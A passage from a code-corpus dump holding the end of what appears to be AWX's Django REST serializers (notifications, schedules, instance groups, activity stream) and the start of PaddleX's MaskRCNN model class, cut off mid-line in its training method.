accepted\n\n\nclass WorkflowJobLaunchSerializer(BaseSerializer):\n\n can_start_without_user_input = serializers.BooleanField(read_only=True)\n defaults = serializers.SerializerMethodField()\n variables_needed_to_start = serializers.ReadOnlyField()\n survey_enabled = serializers.SerializerMethodField()\n extra_vars = VerbatimField(required=False, write_only=True)\n inventory = serializers.PrimaryKeyRelatedField(\n queryset=Inventory.objects.all(),\n required=False, write_only=True\n )\n workflow_job_template_data = serializers.SerializerMethodField()\n\n class Meta:\n model = WorkflowJobTemplate\n fields = ('ask_inventory_on_launch', 'can_start_without_user_input', 'defaults', 'extra_vars',\n 'inventory', 'survey_enabled', 'variables_needed_to_start',\n 'node_templates_missing', 'node_prompts_rejected',\n 'workflow_job_template_data', 'survey_enabled', 'ask_variables_on_launch')\n read_only_fields = ('ask_inventory_on_launch', 'ask_variables_on_launch')\n\n def get_survey_enabled(self, obj):\n if obj:\n return obj.survey_enabled and 'spec' in obj.survey_spec\n return False\n\n def get_defaults(self, obj):\n defaults_dict = {}\n for field_name in WorkflowJobTemplate.get_ask_mapping().keys():\n if field_name == 'inventory':\n defaults_dict[field_name] = dict(\n name=getattrd(obj, '%s.name' % field_name, None),\n id=getattrd(obj, '%s.pk' % field_name, None))\n else:\n defaults_dict[field_name] = getattr(obj, field_name)\n return defaults_dict\n\n def get_workflow_job_template_data(self, obj):\n return dict(name=obj.name, id=obj.id, description=obj.description)\n\n def validate(self, attrs):\n template = self.instance\n\n accepted, rejected, errors = 
template._accept_or_ignore_job_kwargs(**attrs)\n self._ignored_fields = rejected\n\n if template.inventory and template.inventory.pending_deletion is True:\n errors['inventory'] = _(\"The inventory associated with this Workflow is being deleted.\")\n elif 'inventory' in accepted and accepted['inventory'].pending_deletion:\n errors['inventory'] = _(\"The provided inventory is being deleted.\")\n\n if errors:\n raise serializers.ValidationError(errors)\n\n WFJT_extra_vars = template.extra_vars\n WFJT_inventory = template.inventory\n super(WorkflowJobLaunchSerializer, self).validate(attrs)\n template.extra_vars = WFJT_extra_vars\n template.inventory = WFJT_inventory\n return accepted\n\n\nclass NotificationTemplateSerializer(BaseSerializer):\n show_capabilities = ['edit', 'delete', 'copy']\n capabilities_prefetch = [{'copy': 'organization.admin'}]\n\n class Meta:\n model = NotificationTemplate\n fields = ('*', 'organization', 'notification_type', 'notification_configuration')\n\n type_map = {\"string\": (str,),\n \"int\": (int,),\n \"bool\": (bool,),\n \"list\": (list,),\n \"password\": (str,),\n \"object\": (dict, OrderedDict)}\n\n def to_representation(self, obj):\n ret = super(NotificationTemplateSerializer, self).to_representation(obj)\n if 'notification_configuration' in ret:\n ret['notification_configuration'] = obj.display_notification_configuration()\n return ret\n\n def get_related(self, obj):\n res = super(NotificationTemplateSerializer, self).get_related(obj)\n res.update(dict(\n test = self.reverse('api:notification_template_test', kwargs={'pk': obj.pk}),\n notifications = self.reverse('api:notification_template_notification_list', kwargs={'pk': obj.pk}),\n copy = self.reverse('api:notification_template_copy', kwargs={'pk': obj.pk}),\n ))\n if obj.organization:\n res['organization'] = self.reverse('api:organization_detail', kwargs={'pk': obj.organization.pk})\n return res\n\n def _recent_notifications(self, obj):\n return [{'id': x.id, 'status': x.status, 'created': x.created} for x in obj.notifications.all().order_by('-created')[:5]]\n\n def get_summary_fields(self, obj):\n d = super(NotificationTemplateSerializer, self).get_summary_fields(obj)\n d['recent_notifications'] = self._recent_notifications(obj)\n return d\n\n def validate(self, attrs):\n from awx.api.views import NotificationTemplateDetail\n\n notification_type = None\n if 'notification_type' in attrs:\n notification_type = attrs['notification_type']\n elif self.instance:\n notification_type = self.instance.notification_type\n else:\n notification_type = None\n if not notification_type:\n raise serializers.ValidationError(_('Missing required fields for Notification Configuration: notification_type'))\n\n notification_class = NotificationTemplate.CLASS_FOR_NOTIFICATION_TYPE[notification_type]\n missing_fields = []\n incorrect_type_fields = []\n error_list = []\n if 'notification_configuration' not in attrs:\n return attrs\n if self.context['view'].kwargs and isinstance(self.context['view'], NotificationTemplateDetail):\n object_actual = self.context['view'].get_object()\n else:\n object_actual = None\n for field, params in notification_class.init_parameters.items():\n if field not in attrs['notification_configuration']:\n if 'default' in params:\n attrs['notification_configuration'][field] = params['default']\n else:\n missing_fields.append(field)\n continue\n field_val = attrs['notification_configuration'][field]\n field_type = params['type']\n expected_types = self.type_map[field_type]\n if not type(field_val) in 
expected_types:\n incorrect_type_fields.append((field, field_type))\n continue\n if field_type == \"list\" and len(field_val) < 1:\n error_list.append(_(\"No values specified for field '{}'\").format(field))\n continue\n if field_type == \"password\" and field_val == \"$encrypted$\" and object_actual is not None:\n attrs['notification_configuration'][field] = object_actual.notification_configuration[field]\n if missing_fields:\n error_list.append(_(\"Missing required fields for Notification Configuration: {}.\").format(missing_fields))\n if incorrect_type_fields:\n for type_field_error in incorrect_type_fields:\n error_list.append(_(\"Configuration field '{}' incorrect type, expected {}.\").format(type_field_error[0],\n type_field_error[1]))\n if error_list:\n raise serializers.ValidationError(error_list)\n return super(NotificationTemplateSerializer, self).validate(attrs)\n\n\nclass NotificationSerializer(BaseSerializer):\n\n class Meta:\n model = Notification\n fields = ('*', '-name', '-description', 'notification_template', 'error', 'status', 'notifications_sent',\n 'notification_type', 'recipients', 'subject')\n\n def get_related(self, obj):\n res = super(NotificationSerializer, self).get_related(obj)\n res.update(dict(\n notification_template = self.reverse('api:notification_template_detail', kwargs={'pk': obj.notification_template.pk}),\n ))\n return res\n\n\nclass LabelSerializer(BaseSerializer):\n\n class Meta:\n model = Label\n fields = ('*', '-description', 'organization')\n\n def get_related(self, obj):\n res = super(LabelSerializer, self).get_related(obj)\n if obj.organization:\n res['organization'] = self.reverse('api:organization_detail', kwargs={'pk': obj.organization.pk})\n return res\n\n\nclass SchedulePreviewSerializer(BaseSerializer):\n\n class Meta:\n model = Schedule\n fields = ('rrule',)\n\n # We reject rrules if:\n # - DTSTART is not include\n # - INTERVAL is not included\n # - SECONDLY is used\n # - TZID is used\n # - BYDAY prefixed with a number (MO is good but not 20MO)\n # - BYYEARDAY\n # - BYWEEKNO\n # - Multiple DTSTART or RRULE elements\n # - Can't contain both COUNT and UNTIL\n # - COUNT > 999\n def validate_rrule(self, value):\n rrule_value = value\n multi_by_month_day = r\".*?BYMONTHDAY[\\:\\=][0-9]+,-*[0-9]+\"\n multi_by_month = r\".*?BYMONTH[\\:\\=][0-9]+,[0-9]+\"\n by_day_with_numeric_prefix = r\".*?BYDAY[\\:\\=][0-9]+[a-zA-Z]{2}\"\n match_count = re.match(r\".*?(COUNT\\=[0-9]+)\", rrule_value)\n match_multiple_dtstart = re.findall(r\".*?(DTSTART(;[^:]+)?\\:[0-9]+T[0-9]+Z?)\", rrule_value)\n match_native_dtstart = re.findall(r\".*?(DTSTART:[0-9]+T[0-9]+) \", rrule_value)\n match_multiple_rrule = re.findall(r\".*?(RRULE\\:)\", rrule_value)\n if not len(match_multiple_dtstart):\n raise serializers.ValidationError(_('Valid DTSTART required in rrule. Value should start with: DTSTART:YYYYMMDDTHHMMSSZ'))\n if len(match_native_dtstart):\n raise serializers.ValidationError(_('DTSTART cannot be a naive datetime. 
Specify ;TZINFO= or YYYYMMDDTHHMMSSZZ.'))\n if len(match_multiple_dtstart) > 1:\n raise serializers.ValidationError(_('Multiple DTSTART is not supported.'))\n if not len(match_multiple_rrule):\n raise serializers.ValidationError(_('RRULE required in rrule.'))\n if len(match_multiple_rrule) > 1:\n raise serializers.ValidationError(_('Multiple RRULE is not supported.'))\n if 'interval' not in rrule_value.lower():\n raise serializers.ValidationError(_('INTERVAL required in rrule.'))\n if 'secondly' in rrule_value.lower():\n raise serializers.ValidationError(_('SECONDLY is not supported.'))\n if re.match(multi_by_month_day, rrule_value):\n raise serializers.ValidationError(_('Multiple BYMONTHDAYs not supported.'))\n if re.match(multi_by_month, rrule_value):\n raise serializers.ValidationError(_('Multiple BYMONTHs not supported.'))\n if re.match(by_day_with_numeric_prefix, rrule_value):\n raise serializers.ValidationError(_(\"BYDAY with numeric prefix not supported.\"))\n if 'byyearday' in rrule_value.lower():\n raise serializers.ValidationError(_(\"BYYEARDAY not supported.\"))\n if 'byweekno' in rrule_value.lower():\n raise serializers.ValidationError(_(\"BYWEEKNO not supported.\"))\n if 'COUNT' in rrule_value and 'UNTIL' in rrule_value:\n raise serializers.ValidationError(_(\"RRULE may not contain both COUNT and UNTIL\"))\n if match_count:\n count_val = match_count.groups()[0].strip().split(\"=\")\n if int(count_val[1]) > 999:\n raise serializers.ValidationError(_(\"COUNT > 999 is unsupported.\"))\n try:\n Schedule.rrulestr(rrule_value)\n except Exception as e:\n raise serializers.ValidationError(_(\"rrule parsing failed validation: {}\").format(e))\n return value\n\n\nclass ScheduleSerializer(LaunchConfigurationBaseSerializer, SchedulePreviewSerializer):\n show_capabilities = ['edit', 'delete']\n\n timezone = serializers.SerializerMethodField()\n until = serializers.SerializerMethodField()\n\n class Meta:\n model = Schedule\n fields = ('*', 'unified_job_template', 'enabled', 'dtstart', 'dtend', 'rrule', 'next_run', 'timezone',\n 'until')\n\n def get_timezone(self, obj):\n return obj.timezone\n\n def get_until(self, obj):\n return obj.until\n\n def get_related(self, obj):\n res = super(ScheduleSerializer, self).get_related(obj)\n res.update(dict(\n unified_jobs = self.reverse('api:schedule_unified_jobs_list', kwargs={'pk': obj.pk}),\n ))\n if obj.unified_job_template:\n res['unified_job_template'] = obj.unified_job_template.get_absolute_url(self.context.get('request'))\n try:\n if obj.unified_job_template.project:\n res['project'] = obj.unified_job_template.project.get_absolute_url(self.context.get('request'))\n except ObjectDoesNotExist:\n pass\n if obj.inventory:\n res['inventory'] = obj.inventory.get_absolute_url(self.context.get('request'))\n elif obj.unified_job_template and getattr(obj.unified_job_template, 'inventory', None):\n res['inventory'] = obj.unified_job_template.inventory.get_absolute_url(self.context.get('request'))\n return res\n\n def get_summary_fields(self, obj):\n summary_fields = super(ScheduleSerializer, self).get_summary_fields(obj)\n if 'inventory' in summary_fields:\n return summary_fields\n\n inventory = None\n if obj.unified_job_template and getattr(obj.unified_job_template, 'inventory', None):\n inventory = obj.unified_job_template.inventory\n else:\n return summary_fields\n\n summary_fields['inventory'] = dict()\n for field in SUMMARIZABLE_FK_FIELDS['inventory']:\n summary_fields['inventory'][field] = getattr(inventory, field, None)\n\n return summary_fields\n\n 
def validate_unified_job_template(self, value):\n if type(value) == InventorySource and value.source not in SCHEDULEABLE_PROVIDERS:\n raise serializers.ValidationError(_('Inventory Source must be a cloud resource.'))\n elif type(value) == Project and value.scm_type == '':\n raise serializers.ValidationError(_('Manual Project cannot have a schedule set.'))\n elif type(value) == InventorySource and value.source == 'scm' and value.update_on_project_update:\n raise serializers.ValidationError(_(\n 'Inventory sources with `update_on_project_update` cannot be scheduled. '\n 'Schedule its source project `{}` instead.'.format(value.source_project.name)))\n return value\n\n\nclass InstanceSerializer(BaseSerializer):\n\n consumed_capacity = serializers.SerializerMethodField()\n percent_capacity_remaining = serializers.SerializerMethodField()\n jobs_running = serializers.IntegerField(\n help_text=_('Count of jobs in the running or waiting state that '\n 'are targeted for this instance'),\n read_only=True\n )\n jobs_total = serializers.IntegerField(\n help_text=_('Count of all jobs that target this instance'),\n read_only=True\n )\n\n class Meta:\n model = Instance\n read_only_fields = ('uuid', 'hostname', 'version')\n fields = (\"id\", \"type\", \"url\", \"related\", \"uuid\", \"hostname\", \"created\", \"modified\", 'capacity_adjustment',\n \"version\", \"capacity\", \"consumed_capacity\", \"percent_capacity_remaining\", \"jobs_running\", \"jobs_total\",\n \"cpu\", \"memory\", \"cpu_capacity\", \"mem_capacity\", \"enabled\", \"managed_by_policy\")\n\n def get_related(self, obj):\n res = super(InstanceSerializer, self).get_related(obj)\n res['jobs'] = self.reverse('api:instance_unified_jobs_list', kwargs={'pk': obj.pk})\n res['instance_groups'] = self.reverse('api:instance_instance_groups_list', kwargs={'pk': obj.pk})\n return res\n\n def get_consumed_capacity(self, obj):\n return obj.consumed_capacity\n\n def get_percent_capacity_remaining(self, obj):\n if not obj.capacity or obj.consumed_capacity >= obj.capacity:\n return 0.0\n else:\n return float(\"{0:.2f}\".format(((float(obj.capacity) - float(obj.consumed_capacity)) / (float(obj.capacity))) * 100))\n\n\nclass InstanceGroupSerializer(BaseSerializer):\n\n committed_capacity = serializers.SerializerMethodField()\n consumed_capacity = serializers.SerializerMethodField()\n percent_capacity_remaining = serializers.SerializerMethodField()\n jobs_running = serializers.IntegerField(\n help_text=_('Count of jobs in the running or waiting state that '\n 'are targeted for this instance group'),\n read_only=True\n )\n jobs_total = serializers.IntegerField(\n help_text=_('Count of all jobs that target this instance group'),\n read_only=True\n )\n instances = serializers.SerializerMethodField()\n is_controller = serializers.BooleanField(\n help_text=_('Indicates whether instance group controls any other group'),\n read_only=True\n )\n is_isolated = serializers.BooleanField(\n help_text=_('Indicates whether instances in this group are isolated.'\n 'Isolated groups have a designated controller group.'),\n read_only=True\n )\n # NOTE: help_text is duplicated from field definitions, no obvious way of\n # both defining field details here and also getting the field's help_text\n policy_instance_percentage = serializers.IntegerField(\n default=0, min_value=0, max_value=100, required=False, initial=0,\n label=_('Policy Instance Percentage'),\n help_text=_(\"Minimum percentage of all instances that will be automatically assigned to \"\n \"this group when new instances 
come online.\")\n )\n policy_instance_minimum = serializers.IntegerField(\n default=0, min_value=0, required=False, initial=0,\n label=_('Policy Instance Minimum'),\n help_text=_(\"Static minimum number of Instances that will be automatically assign to \"\n \"this group when new instances come online.\")\n )\n policy_instance_list = serializers.ListField(\n child=serializers.CharField(), required=False,\n label=_('Policy Instance List'),\n help_text=_(\"List of exact-match Instances that will be assigned to this group\")\n )\n\n class Meta:\n model = InstanceGroup\n fields = (\"id\", \"type\", \"url\", \"related\", \"name\", \"created\", \"modified\",\n \"capacity\", \"committed_capacity\", \"consumed_capacity\",\n \"percent_capacity_remaining\", \"jobs_running\", \"jobs_total\",\n \"instances\", \"controller\", \"is_controller\", \"is_isolated\",\n \"policy_instance_percentage\", \"policy_instance_minimum\", \"policy_instance_list\")\n\n def get_related(self, obj):\n res = super(InstanceGroupSerializer, self).get_related(obj)\n res['jobs'] = self.reverse('api:instance_group_unified_jobs_list', kwargs={'pk': obj.pk})\n res['instances'] = self.reverse('api:instance_group_instance_list', kwargs={'pk': obj.pk})\n if obj.controller_id:\n res['controller'] = self.reverse('api:instance_group_detail', kwargs={'pk': obj.controller_id})\n return res\n\n def validate_policy_instance_list(self, value):\n for instance_name in value:\n if value.count(instance_name) > 1:\n raise serializers.ValidationError(_('Duplicate entry {}.').format(instance_name))\n if not Instance.objects.filter(hostname=instance_name).exists():\n raise serializers.ValidationError(_('{} is not a valid hostname of an existing instance.').format(instance_name))\n if Instance.objects.get(hostname=instance_name).is_isolated():\n raise serializers.ValidationError(_('Isolated instances may not be added or removed from instances groups via the API.'))\n if self.instance and self.instance.controller_id is not None:\n raise serializers.ValidationError(_('Isolated instance group membership may not be managed via the API.'))\n return value\n\n def validate_name(self, value):\n if self.instance and self.instance.name == 'tower' and value != 'tower':\n raise serializers.ValidationError(_('tower instance group name may not be changed.'))\n return value\n\n def get_capacity_dict(self):\n # Store capacity values (globally computed) in the context\n if 'capacity_map' not in self.context:\n ig_qs = None\n jobs_qs = UnifiedJob.objects.filter(status__in=('running', 'waiting'))\n if self.parent: # Is ListView:\n ig_qs = self.parent.instance\n self.context['capacity_map'] = InstanceGroup.objects.capacity_values(\n qs=ig_qs, tasks=jobs_qs, breakdown=True)\n return self.context['capacity_map']\n\n def get_consumed_capacity(self, obj):\n return self.get_capacity_dict()[obj.name]['running_capacity']\n\n def get_committed_capacity(self, obj):\n return self.get_capacity_dict()[obj.name]['committed_capacity']\n\n def get_percent_capacity_remaining(self, obj):\n if not obj.capacity:\n return 0.0\n consumed = self.get_consumed_capacity(obj)\n if consumed >= obj.capacity:\n return 0.0\n else:\n return float(\"{0:.2f}\".format(\n ((float(obj.capacity) - float(consumed)) / (float(obj.capacity))) * 100)\n )\n\n def get_instances(self, obj):\n return obj.instances.count()\n\n\nclass ActivityStreamSerializer(BaseSerializer):\n\n changes = serializers.SerializerMethodField()\n object_association = serializers.SerializerMethodField(\n help_text=_(\"When present, shows 
the field name of the role or relationship that changed.\"))\n object_type = serializers.SerializerMethodField(\n help_text=_(\"When present, shows the model on which the role or relationship was defined.\"))\n\n @cached_property\n def _local_summarizable_fk_fields(self):\n summary_dict = copy.copy(SUMMARIZABLE_FK_FIELDS)\n # Special requests\n summary_dict['group'] = summary_dict['group'] + ('inventory_id',)\n for key in summary_dict.keys():\n if 'id' not in summary_dict[key]:\n summary_dict[key] = summary_dict[key] + ('id',)\n field_list = list(summary_dict.items())\n # Needed related fields that are not in the default summary fields\n field_list += [\n ('workflow_job_template_node', ('id', 'unified_job_template_id')),\n ('label', ('id', 'name', 'organization_id')),\n ('notification', ('id', 'status', 'notification_type', 'notification_template_id')),\n ('o_auth2_access_token', ('id', 'user_id', 'description', 'application_id', 'scope')),\n ('o_auth2_application', ('id', 'name', 'description')),\n ('credential_type', ('id', 'name', 'description', 'kind', 'managed_by_tower')),\n ('ad_hoc_command', ('id', 'name', 'status', 'limit'))\n ]\n return field_list\n\n class Meta:\n model = ActivityStream\n fields = ('*', '-name', '-description', '-created', '-modified', 'timestamp', 'operation',\n 'changes', 'object1', 'object2', 'object_association', 'action_node', 'object_type')\n\n def get_fields(self):\n ret = super(ActivityStreamSerializer, self).get_fields()\n for key, field in list(ret.items()):\n if key == 'changes':\n field.help_text = _('A summary of the new and changed values when an object is created, updated, or deleted')\n if key == 'object1':\n field.help_text = _('For create, update, and delete events this is the object type that was affected. '\n 'For associate and disassociate events this is the object type associated or disassociated with object2.')\n if key == 'object2':\n field.help_text = _('Unpopulated for create, update, and delete events. 
For associate and disassociate '\n 'events this is the object type that object1 is being associated with.')\n if key == 'operation':\n field.help_text = _('The action taken with respect to the given object(s).')\n return ret\n\n def get_changes(self, obj):\n if obj is None:\n return {}\n try:\n return json.loads(obj.changes)\n except Exception:\n logger.warning(\"Error deserializing activity stream json changes\")\n return {}\n\n def get_object_association(self, obj):\n if not obj.object_relationship_type:\n return \"\"\n elif obj.object_relationship_type.endswith('_role'):\n # roles: these values look like\n # \"awx.main.models.inventory.Inventory.admin_role\"\n # due to historical reasons the UI expects just \"role\" here\n return \"role\"\n # default case: these values look like\n # \"awx.main.models.organization.Organization_notification_templates_success\"\n # so instead of splitting on period we have to take after the first underscore\n try:\n return obj.object_relationship_type.split(\".\")[-1].split(\"_\", 1)[1]\n except Exception:\n logger.debug('Failed to parse activity stream relationship type {}'.format(obj.object_relationship_type))\n return \"\"\n\n def get_object_type(self, obj):\n if not obj.object_relationship_type:\n return \"\"\n elif obj.object_relationship_type.endswith('_role'):\n return camelcase_to_underscore(obj.object_relationship_type.rsplit('.', 2)[-2])\n # default case: these values look like\n # \"awx.main.models.organization.Organization_notification_templates_success\"\n # so we have to take after the last period but before the first underscore.\n try:\n cls = obj.object_relationship_type.rsplit('.', 1)[-1]\n return camelcase_to_underscore(cls.split('_', 1)[0])\n except Exception:\n logger.debug('Failed to parse activity stream relationship type {}'.format(obj.object_relationship_type))\n return \"\"\n\n def get_related(self, obj):\n rel = {}\n if obj.actor is not None:\n rel['actor'] = self.reverse('api:user_detail', kwargs={'pk': obj.actor.pk})\n for fk, __ in self._local_summarizable_fk_fields:\n if not hasattr(obj, fk):\n continue\n m2m_list = self._get_rel(obj, fk)\n if m2m_list:\n rel[fk] = []\n id_list = []\n for thisItem in m2m_list:\n if getattr(thisItem, 'id', None) in id_list:\n continue\n id_list.append(getattr(thisItem, 'id', None))\n if hasattr(thisItem, 'get_absolute_url'):\n rel_url = thisItem.get_absolute_url(self.context.get('request'))\n else:\n view_name = fk + '_detail'\n rel_url = self.reverse('api:' + view_name, kwargs={'pk': thisItem.id})\n rel[fk].append(rel_url)\n\n if fk == 'schedule':\n rel['unified_job_template'] = thisItem.unified_job_template.get_absolute_url(self.context.get('request'))\n if obj.setting and obj.setting.get('category', None):\n rel['setting'] = self.reverse(\n 'api:setting_singleton_detail',\n kwargs={'category_slug': obj.setting['category']}\n )\n return rel\n\n def _get_rel(self, obj, fk):\n related_model = ActivityStream._meta.get_field(fk).related_model\n related_manager = getattr(obj, fk)\n if issubclass(related_model, PolymorphicModel) and hasattr(obj, '_prefetched_objects_cache'):\n # HACK: manually fill PolymorphicModel caches to prevent running query multiple times\n # unnecessary if django-polymorphic issue #68 is solved\n if related_manager.prefetch_cache_name not in obj._prefetched_objects_cache:\n obj._prefetched_objects_cache[related_manager.prefetch_cache_name] = list(related_manager.all())\n return related_manager.all()\n\n def get_summary_fields(self, obj):\n summary_fields = OrderedDict()\n for fk, 
related_fields in self._local_summarizable_fk_fields:\n try:\n if not hasattr(obj, fk):\n continue\n m2m_list = self._get_rel(obj, fk)\n if m2m_list:\n summary_fields[fk] = []\n for thisItem in m2m_list:\n if fk == 'job':\n summary_fields['job_template'] = []\n job_template_item = {}\n job_template_fields = SUMMARIZABLE_FK_FIELDS['job_template']\n job_template = getattr(thisItem, 'job_template', None)\n if job_template is not None:\n for field in job_template_fields:\n fval = getattr(job_template, field, None)\n if fval is not None:\n job_template_item[field] = fval\n summary_fields['job_template'].append(job_template_item)\n if fk == 'workflow_job_template_node':\n summary_fields['workflow_job_template'] = []\n workflow_job_template_item = {}\n workflow_job_template_fields = SUMMARIZABLE_FK_FIELDS['workflow_job_template']\n workflow_job_template = getattr(thisItem, 'workflow_job_template', None)\n if workflow_job_template is not None:\n for field in workflow_job_template_fields:\n fval = getattr(workflow_job_template, field, None)\n if fval is not None:\n workflow_job_template_item[field] = fval\n summary_fields['workflow_job_template'].append(workflow_job_template_item)\n if fk == 'schedule':\n unified_job_template = getattr(thisItem, 'unified_job_template', None)\n if unified_job_template is not None:\n summary_fields[get_type_for_model(unified_job_template)] = {'id': unified_job_template.id,\n 'name': unified_job_template.name}\n thisItemDict = {}\n for field in related_fields:\n fval = getattr(thisItem, field, None)\n if fval is not None:\n thisItemDict[field] = fval\n summary_fields[fk].append(thisItemDict)\n except ObjectDoesNotExist:\n pass\n if obj.actor is not None:\n summary_fields['actor'] = dict(id = obj.actor.id,\n username = obj.actor.username,\n first_name = obj.actor.first_name,\n last_name = obj.actor.last_name)\n elif obj.deleted_actor:\n summary_fields['actor'] = obj.deleted_actor.copy()\n summary_fields['actor']['id'] = None\n if obj.setting:\n summary_fields['setting'] = [obj.setting]\n return summary_fields\n"} {"ext": "py", "sha": "1a2eab502e8edeb022d083bfdb0d6b42b5363cba", "content": "# copyright (c) 2020 PaddlePaddle Authors. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom __future__ import absolute_import\nimport math\nimport tqdm\nimport numpy as np\nfrom multiprocessing.pool import ThreadPool\nimport paddle.fluid as fluid\nimport paddlex.utils.logging as logging\nimport paddlex\nimport copy\nimport os.path as osp\nfrom paddlex.cv.transforms import arrange_transforms\nfrom collections import OrderedDict\nfrom .faster_rcnn import FasterRCNN\nfrom .utils.detection_eval import eval_results, bbox2out, mask2out\n\n\nclass MaskRCNN(FasterRCNN):\n \"\"\"构建MaskRCNN,并实现其训练、评估、预测和模型导出。\n\n Args:\n num_classes (int): 包含了背景类的类别数。默认为81。\n backbone (str): MaskRCNN的backbone网络,取值范围为['ResNet18', 'ResNet50',\n 'ResNet50_vd', 'ResNet101', 'ResNet101_vd', 'HRNet_W18']。默认为'ResNet50'。\n with_fpn (bool): 是否使用FPN结构。默认为True。\n aspect_ratios (list): 生成anchor高宽比的可选值。默认为[0.5, 1.0, 2.0]。\n anchor_sizes (list): 生成anchor大小的可选值。默认为[32, 64, 128, 256, 512]。\n input_channel (int): 输入图像的通道数量。默认为3。\n \"\"\"\n\n def __init__(self,\n num_classes=81,\n backbone='ResNet50',\n with_fpn=True,\n aspect_ratios=[0.5, 1.0, 2.0],\n anchor_sizes=[32, 64, 128, 256, 512],\n input_channel=3):\n self.init_params = locals()\n backbones = [\n 'ResNet18', 'ResNet50', 'ResNet50_vd', 'ResNet101', 'ResNet101_vd',\n 'HRNet_W18'\n ]\n assert backbone in backbones, \"backbone should be one of {}\".format(\n backbones)\n super(FasterRCNN, self).__init__('detector')\n self.backbone = backbone\n self.num_classes = num_classes\n self.with_fpn = with_fpn\n self.anchor_sizes = anchor_sizes\n self.labels = None\n if with_fpn:\n self.mask_head_resolution = 28\n else:\n self.mask_head_resolution = 14\n self.fixed_input_shape = None\n self.input_channel = input_channel\n self.with_dcn = False\n\n def build_net(self, mode='train'):\n train_pre_nms_top_n = 2000 if self.with_fpn else 12000\n test_pre_nms_top_n = 1000 if self.with_fpn else 6000\n num_convs = 4 if self.with_fpn else 0\n model = paddlex.cv.nets.detection.MaskRCNN(\n backbone=self._get_backbone(self.backbone),\n num_classes=self.num_classes,\n mode=mode,\n with_fpn=self.with_fpn,\n train_pre_nms_top_n=train_pre_nms_top_n,\n test_pre_nms_top_n=test_pre_nms_top_n,\n num_convs=num_convs,\n mask_head_resolution=self.mask_head_resolution,\n fixed_input_shape=self.fixed_input_shape,\n input_channel=self.input_channel)\n inputs = model.generate_inputs()\n if mode == 'train':\n model_out = model.build_net(inputs)\n loss = model_out['loss']\n self.optimizer.minimize(loss)\n outputs = OrderedDict(\n [('loss', model_out['loss']),\n ('loss_cls', model_out['loss_cls']),\n ('loss_bbox', model_out['loss_bbox']),\n ('loss_mask', model_out['loss_mask']),\n ('loss_rpn_cls', model_out['loss_rpn_cls']), (\n 'loss_rpn_bbox', model_out['loss_rpn_bbox'])])\n else:\n outputs = model.build_net(inputs)\n return inputs, outputs\n\n def default_optimizer(self, learning_rate, warmup_steps, warmup_start_lr,\n lr_decay_epochs, lr_decay_gamma,\n num_steps_each_epoch):\n if warmup_steps > lr_decay_epochs[0] * 
num_steps_each_epoch:\n logging.error(\n \"In function train(), parameters should satisfy: warmup_steps <= lr_decay_epochs[0]*num_samples_in_train_dataset\",\n exit=False)\n logging.error(\n \"See this doc for more information: https://github.com/PaddlePaddle/PaddleX/blob/develop/docs/appendix/parameters.md#notice\",\n exit=False)\n logging.error(\n \"warmup_steps should less than {} or lr_decay_epochs[0] greater than {}, please modify 'lr_decay_epochs' or 'warmup_steps' in train function\".\n format(lr_decay_epochs[0] * num_steps_each_epoch, warmup_steps\n // num_steps_each_epoch))\n boundaries = [b * num_steps_each_epoch for b in lr_decay_epochs]\n values = [(lr_decay_gamma**i) * learning_rate\n for i in range(len(lr_decay_epochs) + 1)]\n lr_decay = fluid.layers.piecewise_decay(\n boundaries=boundaries, values=values)\n lr_warmup = fluid.layers.linear_lr_warmup(\n learning_rate=lr_decay,\n warmup_steps=warmup_steps,\n start_lr=warmup_start_lr,\n end_lr=learning_rate)\n optimizer = fluid.optimizer.Momentum(\n learning_rate=lr_warmup,\n momentum=0.9,\n regularization=fluid.regularizer.L2Decay(1e-04))\n return optimizer\n\n def train(self,\n num_epochs,\n train_dataset,\n train_batch_size=1,\n eval_dataset=None,\n save_interval_epochs=1,\n log_interval_steps=2,\n save_dir='output',\n pretrain_weights='IMAGENET',\n optimizer=None,\n learning_rate=1.0 / 800,\n warmup_steps=500,\n warmup_start_lr=1.0 / 2400,\n lr_decay_epochs=[8, 11],\n lr_decay_gamma=0.1,\n metric=None,\n use_vdl=False,\n early_stop=False,\n early_stop_patience=5,\n resume_checkpoint=None):\n \"\"\"训练。\n\n Args:\n num_epochs (int): 训练迭代轮数。\n train_dataset (paddlex.datasets): 训练数据读取器。\n train_batch_size (int): 训练或验证数据batch大小。目前检测仅支持单卡评估,训练数据batch大小与\n 显卡数量之商为验证数据batch大小。默认值为1。\n eval_dataset (paddlex.datasets): 验证数据读取器。\n save_interval_epochs (int): 模型保存间隔(单位:迭代轮数)。默认为1。\n log_interval_steps (int): 训练日志输出间隔(单位:迭代次数)。默认为20。\n save_dir (str): 模型保存路径。默认值为'output'。\n pretrain_weights (str): 若指定为路径时,则加载路径下预训练模型;若为字符串'IMAGENET',\n 则自动下载在ImageNet图片数据上预训练的模型权重;若为字符串'COCO',\n 则自动下载在COCO数据集上预训练的模型权重;若为None,则不使用预训练模型。默认为None。\n optimizer (paddle.fluid.optimizer): 优化器。当该参数为None时,使用默认优化器:\n fluid.layers.piecewise_decay衰减策略,fluid.optimizer.Momentum优化方法。\n learning_rate (float): 默认优化器的学习率。默认为1.0/800。\n warmup_steps (int): 默认优化器进行warmup过程的步数。默认为500。\n warmup_start_lr (int): 默认优化器warmup的起始学习率。默认为1.0/2400。\n lr_decay_epochs (list): 默认优化器的学习率衰减轮数。默认为[8, 11]。\n lr_decay_gamma (float): 默认优化器的学习率衰减率。默认为0.1。\n metric (bool): 训练过程中评估的方式,取值范围为['COCO', 'VOC']。\n use_vdl (bool): 是否使用VisualDL进行可视化。默认值为False。\n early_stop (bool): 是否使用提前终止训练策略。默认值为False。\n early_stop_patience (int): 当使用提前终止训练策略时,如果验证集精度在`early_stop_patience`个epoch内\n 连续下降或持平,则终止训练。默认值为5。\n resume_checkpoint (str): 恢复训练时指定上次训练保存的模型路径。若为None,则不会恢复训练。默认值为None。\n\n Raises:\n ValueError: 评估类型不在指定列表中。\n ValueError: 模型从inference model进行加载。\n \"\"\"\n if metric is None:\n if isinstance(train_dataset, paddlex.datasets.CocoDetection) or \\\n isinstance(train_dataset, paddlex.datasets.EasyDataDet):\n metric = 